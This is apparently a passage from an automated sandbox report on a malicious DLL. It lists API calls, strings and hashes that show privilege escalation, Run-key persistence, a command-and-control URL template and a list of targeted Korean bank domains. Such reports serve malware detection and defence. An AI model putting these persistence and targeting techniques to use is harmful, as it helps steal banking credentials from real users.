                                                        • String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$urlmon.dll$wininet.dll
                                                        • API String ID: 2574300362-1569318151
                                                        • Opcode ID: 5b604fb2e00ad6d5b1768fdcc3b301a9170120e2225cd6010a9ac84f16d7b199
                                                        • Instruction ID: 6ff2e891fe8b6a67bc8749009df75dfcb0ea21cbbb39f2f2a6088e9a3be85236
                                                        • Opcode Fuzzy Hash: 5b604fb2e00ad6d5b1768fdcc3b301a9170120e2225cd6010a9ac84f16d7b199
                                                        • Instruction Fuzzy Hash: 4241CC32A0051C6BDB25C6B8CC51BEF7666FB88320F550369F716AB2C1DAF15E45CB44
                                                        Function 10008490 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 30synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 10004F60: GetCurrentProcess.KERNEL32(00000028,00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F6A
                                                          • Part of subcall function 10004F60: OpenProcessToken.ADVAPI32(00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F71
                                                          • Part of subcall function 10004F60: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10004F87
                                                          • Part of subcall function 10004F60: AdjustTokenPrivileges.KERNELBASE ref: 10004FCA
                                                          • Part of subcall function 10004F60: CloseHandle.KERNEL32 ref: 10004FD5
                                                        • CreateMutexA.KERNEL32(00000000,00000001,Global\98012trt8-d8dfsf,?,1000850C), ref: 100084AB
                                                        • GetLastError.KERNEL32(?,1000850C), ref: 100084B3
                                                        • ReleaseMutex.KERNEL32(00000000,?,?,?,1000850C), ref: 100084DD
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,1000850C), ref: 100084E4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleMutexProcessToken$AdjustCreateCurrentErrorLastLookupOpenPrivilegePrivilegesReleaseValue
                                                        • String ID: ERROR_ALREADY_EXISTS$Global\98012trt8-d8dfsf$SeDebugPrivilege$c:\11.txt
                                                        • API String ID: 3631164735-4205529783
                                                        • Opcode ID: 371d1544536f455d4ff2881a43cd085a9ecfe5f63921b749fa4ab69506bf8e29
                                                        • Instruction ID: 292784ae164184b6aa7911133eb3b2ce828e5530ad2962163ce020204c324f4b
                                                        • Opcode Fuzzy Hash: 371d1544536f455d4ff2881a43cd085a9ecfe5f63921b749fa4ab69506bf8e29
                                                        • Instruction Fuzzy Hash: 85E09275D1016067F912B760ACCDADE3A25D78A795F034130F709E5156DF34CAD1C2A2
                                                        Function 1000F870 Relevance: 12.2, APIs: 8, Instructions: 169fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000FEC7,?), ref: 1000F87E
                                                        • GetFileSize.KERNEL32(?,00000000,?,00000000,?), ref: 1000F8EB
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,1000FEC7), ref: 1000F90B
                                                        • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 1000F922
                                                        • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,1000FEC7), ref: 1000F92B
                                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 1000F93C
                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 1000F95C
                                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 1000F96D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: File$PointerRead$HandleInformationSize
                                                        • String ID:
                                                        • API String ID: 2979504256-0
                                                        • Opcode ID: 859882acb2849d7037477cc4baac1a315585c36ddf65a2636b61d75e7ae6334e
                                                        • Instruction ID: 75170083ee676786804825bfb6193be50822de76c0b42b9061a3e677b9cbe5b9
                                                        • Opcode Fuzzy Hash: 859882acb2849d7037477cc4baac1a315585c36ddf65a2636b61d75e7ae6334e
                                                        • Instruction Fuzzy Hash: C851BFB1A04305AFF314CE94CC81FBBB7E4EF88784F10891CF68597684EAB4E9059B56
                                                        Function 10009130 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 91stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: strstr
                                                        • String ID: %s/joy.asp?sid=%s$%s|NULL|%s|%s$09161305$ECF4BB45F69D$NULL$http://
                                                        • API String ID: 1392478783-533519121
                                                        • Opcode ID: b99288b726db85a61a84a1db8eadd2a0bfb92a8b3bc24bd03ce9598594f91a41
                                                        • Instruction ID: cef405a299d08575f7e8510bff70e8bc64c33956ff9c8c1ef28923b5b4943e29
                                                        • Opcode Fuzzy Hash: b99288b726db85a61a84a1db8eadd2a0bfb92a8b3bc24bd03ce9598594f91a41
                                                        • Instruction Fuzzy Hash: 39318E756047416BE724CB38CC01BEBB7D5EBC8254F448A3CB7498A285EF78E544C652
                                                        Function 10009050 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 10004B10: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004B1F
                                                          • Part of subcall function 10004C20: RegCreateKeyExA.KERNEL32(?,?,?,?,?,?,?,?,?,100090BE,80000001,00000000,?), ref: 10004C4D
                                                        • wsprintfA.USER32 ref: 100090E7
                                                          • Part of subcall function 10004CC0: RegSetValueExA.KERNEL32(?,?,?,?,?,?,10009112,?,EvtMgr,00000000,00000001,?), ref: 10004CDE
                                                          • Part of subcall function 10004C60: RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,76F90F00), ref: 10004C65
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateNamePathShortValuewsprintf
                                                        • String ID: %s "%s",QueryPluginInterface$EvtMgr$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==$c:\ftelcs\rjqzr.dll$c:\windows\SysWOW64\rundll32.exe
                                                        • API String ID: 2251888957-2433003403
                                                        • Opcode ID: 8afd94b0278ad8f212652a366a92916e6436194c3e9168692bd8b2d83aaba4e2
                                                        • Instruction ID: d246d73be0499fa8dd0e485b3868a99af5c8bb1a4792636f53a3e73381c3b96b
                                                        • Opcode Fuzzy Hash: 8afd94b0278ad8f212652a366a92916e6436194c3e9168692bd8b2d83aaba4e2
                                                        • Instruction Fuzzy Hash: 3F11BFB56042447BF354D264DC42FEB7694EB94740F810E28B745AA182EBF5E5888297
                                                        Function 1000FA40 Relevance: 7.6, APIs: 5, Instructions: 138fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,753C8400,00000000,10010D59), ref: 1000FA95
                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,753C8400,00000000,10010D59), ref: 1000FAD6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: File$CreatePointer
                                                        • String ID:
                                                        • API String ID: 2024441833-0
                                                        • Opcode ID: b3b746043fca136ba4e81b91f0f512960f4c623e21c03b3bed80360a50ba42b1
                                                        • Instruction ID: 308ac7dc05e7744f4e081a0bdb9278c18c1066b528d8c71e9578729df1ac5f0e
                                                        • Opcode Fuzzy Hash: b3b746043fca136ba4e81b91f0f512960f4c623e21c03b3bed80360a50ba42b1
                                                        • Instruction Fuzzy Hash: ED416AB26057419FE320CF29D884B5BB7ECEB943A9F108A3FF295C6940D370D8959B60
                                                        Function 1000A7D0 Relevance: 6.2, APIs: 4, Instructions: 164COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedDecrement.KERNEL32(?), ref: 1000A8E4
                                                        • InterlockedDecrement.KERNEL32(?), ref: 1000A918
                                                        • InterlockedIncrement.KERNEL32(?), ref: 1000A965
                                                        • InterlockedDecrement.KERNEL32(?), ref: 1000A977
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$Decrement$Increment
                                                        • String ID:
                                                        • API String ID: 2574743344-0
                                                        • Opcode ID: 25fdab2225f7c0ceb369f4a8396a1c2ed694ff04c12ef12b3478b03fc2270baf
                                                        • Instruction ID: 6cbe9a1f3e0df641fd87c38007f5d6db5c369deff50cff04694e886eb5793eaa
                                                        • Opcode Fuzzy Hash: 25fdab2225f7c0ceb369f4a8396a1c2ed694ff04c12ef12b3478b03fc2270baf
                                                        • Instruction Fuzzy Hash: C451D0B2A043929BE710DF258885A0EB7E4FB85690F428A2DF485D7205D734EDCAC792
                                                        Function 10006240 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 124stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 10006261
                                                        • , xrefs: 100062E4
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: strchr
                                                        • String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
                                                        • API String ID: 2830005266-1486078621
                                                        • Opcode ID: 8fe9bc9a7b70a88539dcbdc00b001697f1adf1b456da37eeb74713bcca483fef
                                                        • Instruction ID: a98ee60c11287c2f9934eeec0192e0ab45efcf3a9a7c66bc25993254181b1c03
                                                        • Opcode Fuzzy Hash: 8fe9bc9a7b70a88539dcbdc00b001697f1adf1b456da37eeb74713bcca483fef
                                                        • Instruction Fuzzy Hash: E031A136604A081B972CC878985556B7AC3FBC4270FA5073DFA6B872C0DEF59E498281
                                                        Function 1000FE60 Relevance: 6.1, APIs: 4, Instructions: 114timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,00000000), ref: 1000FEA9
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1000FED6
                                                        • GetLocalTime.KERNEL32(?), ref: 1000FF10
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 1000FF20
                                                          • Part of subcall function 1000F870: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000FEC7,?), ref: 1000F87E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                        • String ID:
                                                        • API String ID: 3986731826-0
                                                        • Opcode ID: d76752544ed911a59727a7edf19554d459005f1b391c5dc4058420ad9c283b3b
                                                        • Instruction ID: ff97dbb23fa899d1f5120cfb08b873e3bb9ee6e36dd1778d440c9f7421c03229
                                                        • Opcode Fuzzy Hash: d76752544ed911a59727a7edf19554d459005f1b391c5dc4058420ad9c283b3b
                                                        • Instruction Fuzzy Hash: A54182B1504B459FE310DF29C88096BF7E8FF89354F408A2EF59A83A51D771E909CB61
                                                        Function 10011725 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wcslen.MSVCRT ref: 10011738
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000002,00000000,00000000,?,?,00000000,00000000,10005F05,00000000), ref: 10011764
                                                        • GetLastError.KERNEL32 ref: 10011774
                                                        • GetLastError.KERNEL32 ref: 1001177A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$ByteCharMultiWidewcslen
                                                        • String ID:
                                                        • API String ID: 4237787585-0
                                                        • Opcode ID: fbde7d7f200f791d168fe25ebe5d393c7a4ec7783423b8fc7ef90a340bc1d4c3
                                                        • Instruction ID: 7da0face451c6111151f8021a2b648fc1a122d1c6800f274b1f82439deee1a5c
                                                        • Opcode Fuzzy Hash: fbde7d7f200f791d168fe25ebe5d393c7a4ec7783423b8fc7ef90a340bc1d4c3
                                                        • Instruction Fuzzy Hash: 80F0C27620815ABDE224E6764CC8DAB77ECDB852F87124639F514DE282E935EC85C2B0
                                                        Function 10004FF0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1000509A,?,76F90F00), ref: 10004FFD
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000500C
                                                        • CloseHandle.KERNEL32(00000000), ref: 10005017
                                                        • CloseHandle.KERNEL32(00000000), ref: 10005024
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleProcess$OpenTerminate
                                                        • String ID:
                                                        • API String ID: 6823918-0
                                                        • Opcode ID: ba73f2dd624f0828aa206dd07c4a16fe15200f4358f6e993a6f0722e7fc0aad8
                                                        • Instruction ID: 5de784d7574f9188aa6451a23a921ffbe079856f50babf4c989d878cd4bace46
                                                        • Opcode Fuzzy Hash: ba73f2dd624f0828aa206dd07c4a16fe15200f4358f6e993a6f0722e7fc0aad8
                                                        • Instruction Fuzzy Hash: 5CE0C2713012306FF6625734AC4CBAF36D4EF0CB52F024200FA06D5186D670CC91C6E1
                                                        Function 10005410 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: strrchr
                                                        • String ID: 123
                                                        • API String ID: 3418686817-2286445522
                                                        • Opcode ID: 39fdab1e5a0020d21e9eb7cee9aaec888a32d0f9fd102b13d19281708b0eb9c8
                                                        • Instruction ID: 1cc1803cb3730628ab3ec1cde8f412e31f934bc2cd6faa80af4b6377ccdad2fb
                                                        • Opcode Fuzzy Hash: 39fdab1e5a0020d21e9eb7cee9aaec888a32d0f9fd102b13d19281708b0eb9c8
                                                        • Instruction Fuzzy Hash: A9218CB56042042BF314C238AC46BBB3BC4DB80365F54062DFA169B1D2EDBBEA894255
                                                        Function 100116B0 Relevance: 5.0, APIs: 4, Instructions: 45stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlen.KERNEL32(00000000,?,00000000,00000000,10009FCF,?,Win32_NetworkAdapterConfiguration), ref: 100116C2
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001), ref: 100116E9
                                                        • GetLastError.KERNEL32(?,00000001), ref: 100116F9
                                                        • GetLastError.KERNEL32(?,00000001), ref: 100116FF
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$ByteCharMultiWidelstrlen
                                                        • String ID:
                                                        • API String ID: 475730466-0
                                                        • Opcode ID: 1416b3daedab4db7fc4709ea3dd8b86842199994e6fa798e2ac8bd62982b39c2
                                                        • Instruction ID: 8c346e5ad489d9a7fb265ebe5e5df2cdd55428298bb11360a6b599af64deaac3
                                                        • Opcode Fuzzy Hash: 1416b3daedab4db7fc4709ea3dd8b86842199994e6fa798e2ac8bd62982b39c2
                                                        • Instruction Fuzzy Hash: 9901F432504226ABD7119B61CC45BDB3FB8EF023A1F204130F804DA290E730D5A1C6A5

                                                        Execution Graph

                                                        Execution Coverage:15.1%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:42
                                                        Total number of Limit Nodes:3
                                                        execution_graph 332 3260fa4 VirtualProtect 333 3260fe3 VirtualProtect 332->333 334 3260fdf 332->334 334->333 335 3260063 336 3260067 335->336 337 32600c3 336->337 338 326006b VirtualAlloc 336->338 338->337 340 3260084 338->340 339 32600b5 VirtualFree 339->337 340->339 353 3260983 354 326098d LoadLibraryA 353->354 355 32609a5 354->355 355->354 356 32609ab GetProcAddress 355->356 357 32609c8 355->357 356->355 341 32607dd 342 326080d 341->342 343 326083b VirtualAlloc 342->343 346 326086a 343->346 344 326090c MessageBoxA ExitProcess 345 3260926 347 3260954 VirtualFree 345->347 346->344 346->345 348 32608ab 346->348 349 32608bb wsprintfA 348->349 351 32608cb wsprintfA 348->351 352 3260906 349->352 351->352 352->344 358 326002a 359 326002c 358->359 360 32600c3 359->360 366 3260047 359->366 363 3260056 VirtualFree 363->360 367 326004b 366->367 368 326003b 367->368 369 3260063 2 API calls 367->369 371 3260056 VirtualFree 367->371 368->363 372 3260063 368->372 369->371 371->368 373 3260067 372->373 374 32600c3 373->374 375 326006b VirtualAlloc 373->375 374->363 375->374 377 3260084 375->377 376 32600b5 VirtualFree 376->374 377->376 378 326102b GetProcAddress 379 3261009 LoadLibraryA

                                                        Callgraph

                                                        Executed Functions

                                                        Function 032607DD Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 151memorywindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,ABAD1000,00001000,00000040,03261100), ref: 0326085C
                                                        • wsprintfA.USER32 ref: 032608E1
                                                        • wsprintfA.USER32 ref: 03260900
                                                        • MessageBoxA.USER32(00000000,File corrupt.,Application error,00000010), ref: 03260918
                                                        • ExitProcess.KERNEL32(00000000), ref: 03260920
                                                        • VirtualFree.KERNELBASE(03270000,00000000,00008000,ED815D00), ref: 03260969
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1498275143.0000000003260000.00000040.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_3260000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Virtualwsprintf$AllocExitFreeMessageProcess
                                                        • String ID: Application error$File corrupt.$SWVU$The ordinal %d could not be located in the DLL %s.$The procedure %s could not be located in the DLL %s.
                                                        • API String ID: 81942880-1423270863
                                                        • Opcode ID: c79b1c611a59b2f0b62d6b76279985f839f984ab3ab89f0c580d4d927e070505
                                                        • Instruction ID: d55eb630c2af6405f6081b5fdb33e4725f31d5bc2efd29b224db5558d7eaebee
                                                        • Opcode Fuzzy Hash: c79b1c611a59b2f0b62d6b76279985f839f984ab3ab89f0c580d4d927e070505
                                                        • Instruction Fuzzy Hash: 6641AF366557469FEB38CF14CC84EEB73A9EF48754F048118EE4697249EB70A8A0CB90
                                                        Function 03260FA4 Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 31 3260fa4-3260fdd VirtualProtect 32 3260fe3-3260ffb VirtualProtect 31->32 33 3260fdf-3260fe1 31->33 33->32
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,00001000,00000004,?,?), ref: 03260FD3
                                                        • VirtualProtect.KERNEL32(?,00001000,?,?), ref: 03260FF1
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1498275143.0000000003260000.00000040.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_3260000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
                                                        • Instruction ID: b7be5aa236b28cac658248528d606ada5cdd8b0e24832555275b6c7461373c28
                                                        • Opcode Fuzzy Hash: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
                                                        • Instruction Fuzzy Hash: 4EF0E933240245AFEB198F64D895EEE7768DF48398B20016AF6029A186CA71E551C754
                                                        Function 03260063 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 34 3260063-3260069 36 32600c3-32600c5 34->36 37 326006b-3260082 VirtualAlloc 34->37 39 32600c6-32600ca 36->39 37->36 38 3260084-32600b0 call 3260390 37->38 42 32600b5-32600c1 VirtualFree 38->42 43 32600b2-32600b4 38->43 42->39 43->42
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0326007E
                                                        • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 032600BE
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1498275143.0000000003260000.00000040.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_3260000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocFree
                                                        • String ID:
                                                        • API String ID: 2087232378-0
                                                        • Opcode ID: c7f3f847bd39c9ffca4c5c83804de00699601861443dcce05f992f4345ead0f0
                                                        • Instruction ID: 74a40e88fc27779adea9fc1922f6952dcdaa766f323c96eb654a861e3dc012ca
                                                        • Opcode Fuzzy Hash: c7f3f847bd39c9ffca4c5c83804de00699601861443dcce05f992f4345ead0f0
                                                        • Instruction Fuzzy Hash: FC018676219602BEE7318AA19C00F37BBDCDF48612F148C5AFAD5C5091D965E4809B70
                                                        Function 0326002A Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 44 326002a-326002e 46 3260034-3260043 call 3260047 44->46 47 32600c3-32600c5 44->47 51 3260045-3260061 call 3260063 46->51 52 32600aa-32600b0 46->52 49 32600c6-32600ca 47->49 51->52 54 32600b5-32600c1 VirtualFree 52->54 55 32600b2-32600b4 52->55 54->49 55->54
                                                        APIs
                                                        • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 032600BE
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1498275143.0000000003260000.00000040.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_3260000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: FreeVirtual
                                                        • String ID:
                                                        • API String ID: 1263568516-0
                                                        • Opcode ID: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
                                                        • Instruction ID: 56dcede05592a7011e63cbfe3b35f63848be351c7133bb28f4528c1778d265d8
                                                        • Opcode Fuzzy Hash: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
                                                        • Instruction Fuzzy Hash: E2F09E2257EB116DF210F7347C44A27FB98DF07221B154D97DC40D6091DD21C8C2A6E4